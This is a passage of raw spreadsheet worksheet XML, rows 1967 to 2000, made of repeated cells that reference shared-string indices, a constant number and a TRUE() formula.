    <row r="1967" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1967" s="1">
        <v>18335</v>
      </c>
      <c r="B1967" t="s">
        <v>0</v>
      </c>
      <c r="C1967" t="s">
        <v>78</v>
      </c>
      <c r="D1967" t="s">
        <v>2097</v>
      </c>
      <c r="E1967" t="s">
        <v>1227</v>
      </c>
      <c r="F1967">
        <v>29117300</v>
      </c>
      <c r="G1967" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1967" t="s">
        <v>2305</v>
      </c>
      <c r="K1967">
        <v>0</v>
      </c>
      <c r="L1967" t="s">
        <v>98</v>
      </c>
      <c r="R1967" t="s">
        <v>5</v>
      </c>
      <c r="S1967" t="s">
        <v>1229</v>
      </c>
      <c r="T1967" t="s">
        <v>7</v>
      </c>
      <c r="U1967" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1968" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1968" s="1">
        <v>18336</v>
      </c>
      <c r="B1968" t="s">
        <v>0</v>
      </c>
      <c r="C1968" t="s">
        <v>78</v>
      </c>
      <c r="D1968" t="s">
        <v>2097</v>
      </c>
      <c r="E1968" t="s">
        <v>1227</v>
      </c>
      <c r="F1968">
        <v>29117300</v>
      </c>
      <c r="G1968" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1968" t="s">
        <v>2306</v>
      </c>
      <c r="K1968">
        <v>0</v>
      </c>
      <c r="L1968" t="s">
        <v>98</v>
      </c>
      <c r="R1968" t="s">
        <v>5</v>
      </c>
      <c r="S1968" t="s">
        <v>1229</v>
      </c>
      <c r="T1968" t="s">
        <v>7</v>
      </c>
      <c r="U1968" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1969" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1969" s="1">
        <v>18337</v>
      </c>
      <c r="B1969" t="s">
        <v>0</v>
      </c>
      <c r="C1969" t="s">
        <v>1</v>
      </c>
      <c r="D1969" t="s">
        <v>2097</v>
      </c>
      <c r="E1969" t="s">
        <v>1227</v>
      </c>
      <c r="F1969">
        <v>29117300</v>
      </c>
      <c r="G1969" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1969" t="s">
        <v>2307</v>
      </c>
      <c r="K1969">
        <v>0</v>
      </c>
      <c r="L1969" t="s">
        <v>98</v>
      </c>
      <c r="R1969" t="s">
        <v>5</v>
      </c>
      <c r="S1969" t="s">
        <v>1229</v>
      </c>
      <c r="T1969" t="s">
        <v>7</v>
      </c>
      <c r="U1969" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1970" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1970" s="1">
        <v>18338</v>
      </c>
      <c r="B1970" t="s">
        <v>0</v>
      </c>
      <c r="C1970" t="s">
        <v>78</v>
      </c>
      <c r="D1970" t="s">
        <v>2097</v>
      </c>
      <c r="E1970" t="s">
        <v>1227</v>
      </c>
      <c r="F1970">
        <v>29117300</v>
      </c>
      <c r="G1970" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1970" t="s">
        <v>2308</v>
      </c>
      <c r="K1970">
        <v>0</v>
      </c>
      <c r="L1970" t="s">
        <v>98</v>
      </c>
      <c r="R1970" t="s">
        <v>5</v>
      </c>
      <c r="S1970" t="s">
        <v>1229</v>
      </c>
      <c r="T1970" t="s">
        <v>7</v>
      </c>
      <c r="U1970" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1971" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1971" s="1">
        <v>18339</v>
      </c>
      <c r="B1971" t="s">
        <v>0</v>
      </c>
      <c r="C1971" t="s">
        <v>78</v>
      </c>
      <c r="D1971" t="s">
        <v>2097</v>
      </c>
      <c r="E1971" t="s">
        <v>1227</v>
      </c>
      <c r="F1971">
        <v>29117300</v>
      </c>
      <c r="G1971" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1971" t="s">
        <v>2309</v>
      </c>
      <c r="K1971">
        <v>0</v>
      </c>
      <c r="L1971" t="s">
        <v>98</v>
      </c>
      <c r="R1971" t="s">
        <v>5</v>
      </c>
      <c r="S1971" t="s">
        <v>1229</v>
      </c>
      <c r="T1971" t="s">
        <v>7</v>
      </c>
      <c r="U1971" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1972" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1972" s="1">
        <v>18340</v>
      </c>
      <c r="B1972" t="s">
        <v>0</v>
      </c>
      <c r="C1972" t="s">
        <v>78</v>
      </c>
      <c r="D1972" t="s">
        <v>2097</v>
      </c>
      <c r="E1972" t="s">
        <v>1227</v>
      </c>
      <c r="F1972">
        <v>29117300</v>
      </c>
      <c r="G1972" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1972" t="s">
        <v>2310</v>
      </c>
      <c r="K1972">
        <v>0</v>
      </c>
      <c r="L1972" t="s">
        <v>98</v>
      </c>
      <c r="R1972" t="s">
        <v>5</v>
      </c>
      <c r="S1972" t="s">
        <v>1229</v>
      </c>
      <c r="T1972" t="s">
        <v>7</v>
      </c>
      <c r="U1972" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1973" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1973" s="1">
        <v>18341</v>
      </c>
      <c r="B1973" t="s">
        <v>0</v>
      </c>
      <c r="C1973" t="s">
        <v>78</v>
      </c>
      <c r="D1973" t="s">
        <v>2097</v>
      </c>
      <c r="E1973" t="s">
        <v>1227</v>
      </c>
      <c r="F1973">
        <v>29117300</v>
      </c>
      <c r="G1973" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1973" t="s">
        <v>2311</v>
      </c>
      <c r="K1973">
        <v>0</v>
      </c>
      <c r="L1973" t="s">
        <v>98</v>
      </c>
      <c r="R1973" t="s">
        <v>5</v>
      </c>
      <c r="S1973" t="s">
        <v>1229</v>
      </c>
      <c r="T1973" t="s">
        <v>7</v>
      </c>
      <c r="U1973" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1974" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1974" s="1">
        <v>18342</v>
      </c>
      <c r="B1974" t="s">
        <v>0</v>
      </c>
      <c r="C1974" t="s">
        <v>78</v>
      </c>
      <c r="D1974" t="s">
        <v>2097</v>
      </c>
      <c r="E1974" t="s">
        <v>1227</v>
      </c>
      <c r="F1974">
        <v>29117300</v>
      </c>
      <c r="G1974" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1974" t="s">
        <v>2312</v>
      </c>
      <c r="K1974">
        <v>0</v>
      </c>
      <c r="L1974" t="s">
        <v>98</v>
      </c>
      <c r="R1974" t="s">
        <v>5</v>
      </c>
      <c r="S1974" t="s">
        <v>1229</v>
      </c>
      <c r="T1974" t="s">
        <v>7</v>
      </c>
      <c r="U1974" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1975" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1975" s="1">
        <v>18343</v>
      </c>
      <c r="B1975" t="s">
        <v>0</v>
      </c>
      <c r="C1975" t="s">
        <v>78</v>
      </c>
      <c r="D1975" t="s">
        <v>2097</v>
      </c>
      <c r="E1975" t="s">
        <v>1227</v>
      </c>
      <c r="F1975">
        <v>29117300</v>
      </c>
      <c r="G1975" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1975" t="s">
        <v>2313</v>
      </c>
      <c r="K1975">
        <v>0</v>
      </c>
      <c r="L1975" t="s">
        <v>98</v>
      </c>
      <c r="R1975" t="s">
        <v>5</v>
      </c>
      <c r="S1975" t="s">
        <v>1229</v>
      </c>
      <c r="T1975" t="s">
        <v>7</v>
      </c>
      <c r="U1975" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1976" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1976" s="1">
        <v>18344</v>
      </c>
      <c r="B1976" t="s">
        <v>0</v>
      </c>
      <c r="C1976" t="s">
        <v>78</v>
      </c>
      <c r="D1976" t="s">
        <v>2097</v>
      </c>
      <c r="E1976" t="s">
        <v>1227</v>
      </c>
      <c r="F1976">
        <v>29117300</v>
      </c>
      <c r="G1976" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1976" t="s">
        <v>2314</v>
      </c>
      <c r="K1976">
        <v>0</v>
      </c>
      <c r="L1976" t="s">
        <v>98</v>
      </c>
      <c r="R1976" t="s">
        <v>5</v>
      </c>
      <c r="S1976" t="s">
        <v>1229</v>
      </c>
      <c r="T1976" t="s">
        <v>7</v>
      </c>
      <c r="U1976" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1977" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1977" s="1">
        <v>18345</v>
      </c>
      <c r="B1977" t="s">
        <v>0</v>
      </c>
      <c r="C1977" t="s">
        <v>1</v>
      </c>
      <c r="D1977" t="s">
        <v>2097</v>
      </c>
      <c r="E1977" t="s">
        <v>1227</v>
      </c>
      <c r="F1977">
        <v>29117300</v>
      </c>
      <c r="G1977" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1977" t="s">
        <v>2315</v>
      </c>
      <c r="K1977">
        <v>0</v>
      </c>
      <c r="L1977" t="s">
        <v>98</v>
      </c>
      <c r="R1977" t="s">
        <v>5</v>
      </c>
      <c r="S1977" t="s">
        <v>1229</v>
      </c>
      <c r="T1977" t="s">
        <v>7</v>
      </c>
      <c r="U1977" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1978" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1978" s="1">
        <v>18346</v>
      </c>
      <c r="B1978" t="s">
        <v>0</v>
      </c>
      <c r="C1978" t="s">
        <v>78</v>
      </c>
      <c r="D1978" t="s">
        <v>2097</v>
      </c>
      <c r="E1978" t="s">
        <v>1227</v>
      </c>
      <c r="F1978">
        <v>29117300</v>
      </c>
      <c r="G1978" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1978" t="s">
        <v>2316</v>
      </c>
      <c r="K1978">
        <v>0</v>
      </c>
      <c r="L1978" t="s">
        <v>98</v>
      </c>
      <c r="R1978" t="s">
        <v>5</v>
      </c>
      <c r="S1978" t="s">
        <v>1229</v>
      </c>
      <c r="T1978" t="s">
        <v>7</v>
      </c>
      <c r="U1978" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1979" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1979" s="1">
        <v>18347</v>
      </c>
      <c r="B1979" t="s">
        <v>0</v>
      </c>
      <c r="C1979" t="s">
        <v>78</v>
      </c>
      <c r="D1979" t="s">
        <v>2097</v>
      </c>
      <c r="E1979" t="s">
        <v>1227</v>
      </c>
      <c r="F1979">
        <v>29117300</v>
      </c>
      <c r="G1979" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1979" t="s">
        <v>2317</v>
      </c>
      <c r="K1979">
        <v>0</v>
      </c>
      <c r="L1979" t="s">
        <v>98</v>
      </c>
      <c r="R1979" t="s">
        <v>5</v>
      </c>
      <c r="S1979" t="s">
        <v>1229</v>
      </c>
      <c r="T1979" t="s">
        <v>7</v>
      </c>
      <c r="U1979" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1980" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1980" s="1">
        <v>18348</v>
      </c>
      <c r="B1980" t="s">
        <v>0</v>
      </c>
      <c r="C1980" t="s">
        <v>78</v>
      </c>
      <c r="D1980" t="s">
        <v>2097</v>
      </c>
      <c r="E1980" t="s">
        <v>1227</v>
      </c>
      <c r="F1980">
        <v>29117300</v>
      </c>
      <c r="G1980" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1980" t="s">
        <v>2318</v>
      </c>
      <c r="K1980">
        <v>0</v>
      </c>
      <c r="L1980" t="s">
        <v>98</v>
      </c>
      <c r="R1980" t="s">
        <v>5</v>
      </c>
      <c r="S1980" t="s">
        <v>1229</v>
      </c>
      <c r="T1980" t="s">
        <v>7</v>
      </c>
      <c r="U1980" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1981" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1981" s="1">
        <v>18349</v>
      </c>
      <c r="B1981" t="s">
        <v>0</v>
      </c>
      <c r="C1981" t="s">
        <v>78</v>
      </c>
      <c r="D1981" t="s">
        <v>2097</v>
      </c>
      <c r="E1981" t="s">
        <v>1227</v>
      </c>
      <c r="F1981">
        <v>29117300</v>
      </c>
      <c r="G1981" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1981" t="s">
        <v>2319</v>
      </c>
      <c r="K1981">
        <v>0</v>
      </c>
      <c r="L1981" t="s">
        <v>98</v>
      </c>
      <c r="R1981" t="s">
        <v>5</v>
      </c>
      <c r="S1981" t="s">
        <v>1229</v>
      </c>
      <c r="T1981" t="s">
        <v>7</v>
      </c>
      <c r="U1981" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1982" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1982" s="1">
        <v>18350</v>
      </c>
      <c r="B1982" t="s">
        <v>0</v>
      </c>
      <c r="C1982" t="s">
        <v>78</v>
      </c>
      <c r="D1982" t="s">
        <v>2097</v>
      </c>
      <c r="E1982" t="s">
        <v>1227</v>
      </c>
      <c r="F1982">
        <v>29117300</v>
      </c>
      <c r="G1982" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1982" t="s">
        <v>2320</v>
      </c>
      <c r="K1982">
        <v>0</v>
      </c>
      <c r="L1982" t="s">
        <v>98</v>
      </c>
      <c r="R1982" t="s">
        <v>5</v>
      </c>
      <c r="S1982" t="s">
        <v>1229</v>
      </c>
      <c r="T1982" t="s">
        <v>7</v>
      </c>
      <c r="U1982" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1983" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1983" s="1">
        <v>18351</v>
      </c>
      <c r="B1983" t="s">
        <v>0</v>
      </c>
      <c r="C1983" t="s">
        <v>78</v>
      </c>
      <c r="D1983" t="s">
        <v>2097</v>
      </c>
      <c r="E1983" t="s">
        <v>1227</v>
      </c>
      <c r="F1983">
        <v>29117300</v>
      </c>
      <c r="G1983" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1983" t="s">
        <v>2321</v>
      </c>
      <c r="K1983">
        <v>0</v>
      </c>
      <c r="L1983" t="s">
        <v>98</v>
      </c>
      <c r="R1983" t="s">
        <v>5</v>
      </c>
      <c r="S1983" t="s">
        <v>1229</v>
      </c>
      <c r="T1983" t="s">
        <v>7</v>
      </c>
      <c r="U1983" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1984" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1984" s="1">
        <v>18352</v>
      </c>
      <c r="B1984" t="s">
        <v>0</v>
      </c>
      <c r="C1984" t="s">
        <v>78</v>
      </c>
      <c r="D1984" t="s">
        <v>2097</v>
      </c>
      <c r="E1984" t="s">
        <v>1227</v>
      </c>
      <c r="F1984">
        <v>29117300</v>
      </c>
      <c r="G1984" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1984" t="s">
        <v>2322</v>
      </c>
      <c r="K1984">
        <v>0</v>
      </c>
      <c r="L1984" t="s">
        <v>98</v>
      </c>
      <c r="R1984" t="s">
        <v>5</v>
      </c>
      <c r="S1984" t="s">
        <v>1229</v>
      </c>
      <c r="T1984" t="s">
        <v>7</v>
      </c>
      <c r="U1984" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1985" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1985" s="1">
        <v>18353</v>
      </c>
      <c r="B1985" t="s">
        <v>0</v>
      </c>
      <c r="C1985" t="s">
        <v>78</v>
      </c>
      <c r="D1985" t="s">
        <v>2097</v>
      </c>
      <c r="E1985" t="s">
        <v>1227</v>
      </c>
      <c r="F1985">
        <v>29117300</v>
      </c>
      <c r="G1985" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1985" t="s">
        <v>2323</v>
      </c>
      <c r="K1985">
        <v>0</v>
      </c>
      <c r="L1985" t="s">
        <v>98</v>
      </c>
      <c r="R1985" t="s">
        <v>5</v>
      </c>
      <c r="S1985" t="s">
        <v>1229</v>
      </c>
      <c r="T1985" t="s">
        <v>7</v>
      </c>
      <c r="U1985" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1986" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1986" s="1">
        <v>18354</v>
      </c>
      <c r="B1986" t="s">
        <v>0</v>
      </c>
      <c r="C1986" t="s">
        <v>78</v>
      </c>
      <c r="D1986" t="s">
        <v>2097</v>
      </c>
      <c r="E1986" t="s">
        <v>1227</v>
      </c>
      <c r="F1986">
        <v>29117300</v>
      </c>
      <c r="G1986" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1986" t="s">
        <v>2324</v>
      </c>
      <c r="K1986">
        <v>0</v>
      </c>
      <c r="L1986" t="s">
        <v>98</v>
      </c>
      <c r="R1986" t="s">
        <v>5</v>
      </c>
      <c r="S1986" t="s">
        <v>1229</v>
      </c>
      <c r="T1986" t="s">
        <v>7</v>
      </c>
      <c r="U1986" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1987" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1987" s="1">
        <v>18355</v>
      </c>
      <c r="B1987" t="s">
        <v>0</v>
      </c>
      <c r="C1987" t="s">
        <v>78</v>
      </c>
      <c r="D1987" t="s">
        <v>2097</v>
      </c>
      <c r="E1987" t="s">
        <v>1227</v>
      </c>
      <c r="F1987">
        <v>29117300</v>
      </c>
      <c r="G1987" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1987" t="s">
        <v>2325</v>
      </c>
      <c r="K1987">
        <v>0</v>
      </c>
      <c r="L1987" t="s">
        <v>98</v>
      </c>
      <c r="R1987" t="s">
        <v>5</v>
      </c>
      <c r="S1987" t="s">
        <v>1229</v>
      </c>
      <c r="T1987" t="s">
        <v>7</v>
      </c>
      <c r="U1987" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1988" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1988" s="1">
        <v>18356</v>
      </c>
      <c r="B1988" t="s">
        <v>0</v>
      </c>
      <c r="C1988" t="s">
        <v>78</v>
      </c>
      <c r="D1988" t="s">
        <v>2097</v>
      </c>
      <c r="E1988" t="s">
        <v>1227</v>
      </c>
      <c r="F1988">
        <v>29117300</v>
      </c>
      <c r="G1988" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1988" t="s">
        <v>2326</v>
      </c>
      <c r="K1988">
        <v>0</v>
      </c>
      <c r="L1988" t="s">
        <v>98</v>
      </c>
      <c r="R1988" t="s">
        <v>5</v>
      </c>
      <c r="S1988" t="s">
        <v>1229</v>
      </c>
      <c r="T1988" t="s">
        <v>7</v>
      </c>
      <c r="U1988" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1989" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1989" s="1">
        <v>18357</v>
      </c>
      <c r="B1989" t="s">
        <v>0</v>
      </c>
      <c r="C1989" t="s">
        <v>78</v>
      </c>
      <c r="D1989" t="s">
        <v>2097</v>
      </c>
      <c r="E1989" t="s">
        <v>1227</v>
      </c>
      <c r="F1989">
        <v>29117300</v>
      </c>
      <c r="G1989" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1989" t="s">
        <v>2327</v>
      </c>
      <c r="K1989">
        <v>0</v>
      </c>
      <c r="L1989" t="s">
        <v>98</v>
      </c>
      <c r="R1989" t="s">
        <v>5</v>
      </c>
      <c r="S1989" t="s">
        <v>1229</v>
      </c>
      <c r="T1989" t="s">
        <v>7</v>
      </c>
      <c r="U1989" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1990" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1990" s="1">
        <v>18358</v>
      </c>
      <c r="B1990" t="s">
        <v>0</v>
      </c>
      <c r="C1990" t="s">
        <v>78</v>
      </c>
      <c r="D1990" t="s">
        <v>2097</v>
      </c>
      <c r="E1990" t="s">
        <v>1227</v>
      </c>
      <c r="F1990">
        <v>29117300</v>
      </c>
      <c r="G1990" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1990" t="s">
        <v>2328</v>
      </c>
      <c r="K1990">
        <v>0</v>
      </c>
      <c r="L1990" t="s">
        <v>98</v>
      </c>
      <c r="R1990" t="s">
        <v>5</v>
      </c>
      <c r="S1990" t="s">
        <v>1229</v>
      </c>
      <c r="T1990" t="s">
        <v>7</v>
      </c>
      <c r="U1990" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1991" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1991" s="1">
        <v>18359</v>
      </c>
      <c r="B1991" t="s">
        <v>0</v>
      </c>
      <c r="C1991" t="s">
        <v>78</v>
      </c>
      <c r="D1991" t="s">
        <v>2097</v>
      </c>
      <c r="E1991" t="s">
        <v>1227</v>
      </c>
      <c r="F1991">
        <v>29117300</v>
      </c>
      <c r="G1991" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1991" t="s">
        <v>2329</v>
      </c>
      <c r="K1991">
        <v>0</v>
      </c>
      <c r="L1991" t="s">
        <v>98</v>
      </c>
      <c r="R1991" t="s">
        <v>5</v>
      </c>
      <c r="S1991" t="s">
        <v>1229</v>
      </c>
      <c r="T1991" t="s">
        <v>7</v>
      </c>
      <c r="U1991" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1992" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1992" s="1">
        <v>18360</v>
      </c>
      <c r="B1992" t="s">
        <v>0</v>
      </c>
      <c r="C1992" t="s">
        <v>78</v>
      </c>
      <c r="D1992" t="s">
        <v>2097</v>
      </c>
      <c r="E1992" t="s">
        <v>1227</v>
      </c>
      <c r="F1992">
        <v>29117300</v>
      </c>
      <c r="G1992" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1992" t="s">
        <v>2330</v>
      </c>
      <c r="K1992">
        <v>0</v>
      </c>
      <c r="L1992" t="s">
        <v>98</v>
      </c>
      <c r="R1992" t="s">
        <v>5</v>
      </c>
      <c r="S1992" t="s">
        <v>1229</v>
      </c>
      <c r="T1992" t="s">
        <v>7</v>
      </c>
      <c r="U1992" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1993" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1993" s="1">
        <v>18361</v>
      </c>
      <c r="B1993" t="s">
        <v>0</v>
      </c>
      <c r="C1993" t="s">
        <v>78</v>
      </c>
      <c r="D1993" t="s">
        <v>2097</v>
      </c>
      <c r="E1993" t="s">
        <v>1227</v>
      </c>
      <c r="F1993">
        <v>29117300</v>
      </c>
      <c r="G1993" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1993" t="s">
        <v>2331</v>
      </c>
      <c r="K1993">
        <v>0</v>
      </c>
      <c r="L1993" t="s">
        <v>98</v>
      </c>
      <c r="R1993" t="s">
        <v>5</v>
      </c>
      <c r="S1993" t="s">
        <v>1229</v>
      </c>
      <c r="T1993" t="s">
        <v>7</v>
      </c>
      <c r="U1993" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1994" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1994" s="1">
        <v>18362</v>
      </c>
      <c r="B1994" t="s">
        <v>0</v>
      </c>
      <c r="C1994" t="s">
        <v>78</v>
      </c>
      <c r="D1994" t="s">
        <v>2097</v>
      </c>
      <c r="E1994" t="s">
        <v>1227</v>
      </c>
      <c r="F1994">
        <v>29117300</v>
      </c>
      <c r="G1994" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1994" t="s">
        <v>2332</v>
      </c>
      <c r="K1994">
        <v>0</v>
      </c>
      <c r="L1994" t="s">
        <v>98</v>
      </c>
      <c r="R1994" t="s">
        <v>5</v>
      </c>
      <c r="S1994" t="s">
        <v>1229</v>
      </c>
      <c r="T1994" t="s">
        <v>7</v>
      </c>
      <c r="U1994" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1995" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1995" s="1">
        <v>18363</v>
      </c>
      <c r="B1995" t="s">
        <v>0</v>
      </c>
      <c r="C1995" t="s">
        <v>78</v>
      </c>
      <c r="D1995" t="s">
        <v>2097</v>
      </c>
      <c r="E1995" t="s">
        <v>1227</v>
      </c>
      <c r="F1995">
        <v>29117300</v>
      </c>
      <c r="G1995" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1995" t="s">
        <v>2333</v>
      </c>
      <c r="K1995">
        <v>0</v>
      </c>
      <c r="L1995" t="s">
        <v>98</v>
      </c>
      <c r="R1995" t="s">
        <v>5</v>
      </c>
      <c r="S1995" t="s">
        <v>1229</v>
      </c>
      <c r="T1995" t="s">
        <v>7</v>
      </c>
      <c r="U1995" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1996" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1996" s="1">
        <v>18364</v>
      </c>
      <c r="B1996" t="s">
        <v>0</v>
      </c>
      <c r="C1996" t="s">
        <v>78</v>
      </c>
      <c r="D1996" t="s">
        <v>2097</v>
      </c>
      <c r="E1996" t="s">
        <v>1227</v>
      </c>
      <c r="F1996">
        <v>29117300</v>
      </c>
      <c r="G1996" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1996" t="s">
        <v>2334</v>
      </c>
      <c r="K1996">
        <v>0</v>
      </c>
      <c r="L1996" t="s">
        <v>98</v>
      </c>
      <c r="R1996" t="s">
        <v>5</v>
      </c>
      <c r="S1996" t="s">
        <v>1229</v>
      </c>
      <c r="T1996" t="s">
        <v>7</v>
      </c>
      <c r="U1996" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1997" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1997" s="1">
        <v>18365</v>
      </c>
      <c r="B1997" t="s">
        <v>0</v>
      </c>
      <c r="C1997" t="s">
        <v>78</v>
      </c>
      <c r="D1997" t="s">
        <v>2097</v>
      </c>
      <c r="E1997" t="s">
        <v>1227</v>
      </c>
      <c r="F1997">
        <v>29117300</v>
      </c>
      <c r="G1997" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1997" t="s">
        <v>2335</v>
      </c>
      <c r="K1997">
        <v>0</v>
      </c>
      <c r="L1997" t="s">
        <v>98</v>
      </c>
      <c r="R1997" t="s">
        <v>5</v>
      </c>
      <c r="S1997" t="s">
        <v>1229</v>
      </c>
      <c r="T1997" t="s">
        <v>7</v>
      </c>
      <c r="U1997" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1998" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1998" s="1">
        <v>18366</v>
      </c>
      <c r="B1998" t="s">
        <v>0</v>
      </c>
      <c r="C1998" t="s">
        <v>78</v>
      </c>
      <c r="D1998" t="s">
        <v>2097</v>
      </c>
      <c r="E1998" t="s">
        <v>1227</v>
      </c>
      <c r="F1998">
        <v>29117300</v>
      </c>
      <c r="G1998" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1998" t="s">
        <v>2336</v>
      </c>
      <c r="K1998">
        <v>0</v>
      </c>
      <c r="L1998" t="s">
        <v>98</v>
      </c>
      <c r="R1998" t="s">
        <v>5</v>
      </c>
      <c r="S1998" t="s">
        <v>1229</v>
      </c>
      <c r="T1998" t="s">
        <v>7</v>
      </c>
      <c r="U1998" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1999" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1999" s="1">
        <v>18367</v>
      </c>
      <c r="B1999" t="s">
        <v>0</v>
      </c>
      <c r="C1999" t="s">
        <v>78</v>
      </c>
      <c r="D1999" t="s">
        <v>2097</v>
      </c>
      <c r="E1999" t="s">
        <v>1227</v>
      </c>
      <c r="F1999">
        <v>29117300</v>
      </c>
      <c r="G1999" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1999" t="s">
        <v>2337</v>
      </c>
      <c r="K1999">
        <v>0</v>
      </c>
      <c r="L1999" t="s">
        <v>98</v>
      </c>
      <c r="R1999" t="s">
        <v>5</v>
      </c>
      <c r="S1999" t="s">
        <v>1229</v>
      </c>
      <c r="T1999" t="s">
        <v>7</v>
      </c>
      <c r="U1999" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2000" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2000" s="1">
        <v>18368</v>
      </c>
      <c r="B2000" t="s">
        <v>0</v>
      </c>
      <c r="C2000" t="s">
        <v>78</v>
      </c>
      <c r="D2000" t="s">
        <v>2097</v>
      </c>
      <c r="E2000" t="s">
        <v>1227</v>
      </c>
      <c r="F2000">
        <v>29117300</v>
      </c>
      <c r="G2000" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2000" t="s">
        <v>2338</v>
      </c>
      <c r="K2000">
        <v>0</v>
      </c>
      <c r="L2000" t="s">
        <v>98</v>
      </c>
      <c r="R2000" t="s">
        <v>5</v>
      </c>
      <c r="S2000" t="s">
        <v>1229</v>
      </c>
      <c r="T2000" t="s">
        <v>7</v>
      </c>
      <c r="U2000" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2001" spans="1:21" x14ac:dyDescent="0.2">
